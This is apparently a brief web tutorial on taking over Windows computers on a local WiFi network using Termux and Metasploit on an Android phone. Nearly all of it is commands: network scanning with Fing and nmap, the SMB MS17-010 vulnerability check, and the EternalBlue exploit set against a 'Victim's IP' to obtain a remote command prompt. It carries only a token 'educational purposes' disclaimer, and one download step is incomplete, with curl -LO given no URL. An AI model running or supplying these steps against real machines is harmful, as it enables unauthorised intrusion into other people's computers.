Hacking Windows with an Android Phone

Hacking Windows with an Android Phone

Disclaimer: Everything on this site is for educational purposes and should not be used for evil.

Note: You will only be able to hack PCs with internal IPs (Connected to your WiFi)

You will need:

Termux
Metasploit
Fing

Tutorial:

apt update
apt upgrade
apt install curl
curl -LO
cd metasploit-framework-4.14.28
./msfconsole

Next, scan your network with Fing and find a device you want to hack.
Then install nmap:
apt-get update
apt-get install nmap
nmap [Victim's IP]
If port 445 is open, we can move on to the next step.
Check for vulnerabilities:
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS [Victim's IP]
run
If the result is that the victim is vulnerable we can continue onto the next step:
use exploit/windows/smb/ms17_010_eternalblue
set RHOST [Victim's IP]
set ProcessName explorer.exe
exploit
If everything goes well, you should be able to get access to the command prompt of that computer

Comments